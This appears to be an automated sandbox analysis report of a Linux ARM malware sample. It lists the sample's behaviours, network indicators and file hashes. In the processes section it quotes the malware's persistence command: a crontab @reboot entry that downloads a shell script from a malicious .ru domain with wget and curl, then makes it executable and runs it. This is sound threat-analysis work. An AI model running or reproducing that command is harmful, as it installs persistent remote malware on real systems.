Analysis Overview
SHA256
ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645
Threat Level: Shows suspicious behavior
The file ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Enumerates running processes
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:46
Reported
2024-10-27 02:49
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
140s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
|---|---|---|---|
| Destination IP | 81.169.136.222 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.wNhaz5 | /usr/bin/crontab | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A |
Reads runtime system information
Processes
/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
[/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:3869 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.wNhaz5
| Hash | Value |
|---|---|
| MD5 | a7092eb6aa79161f5a3758d751aae1b3 |
| SHA1 | 0f3e2f380e53ee3e3c412b75715939031fa40b04 |
| SHA256 | f6cd9800f1a8a1025b04977d62bcaf5f0d4642f8822ea73db53b5d986d576ac4 |
| SHA512 | 02ea889ecb85f5ee111b8c7cc9937423214e809d1edbe85cedb8984e9dbc0a2c49561ca9159d468216bb27617211d74b80f2aefab34b2199b7e007eb7b487ba0 |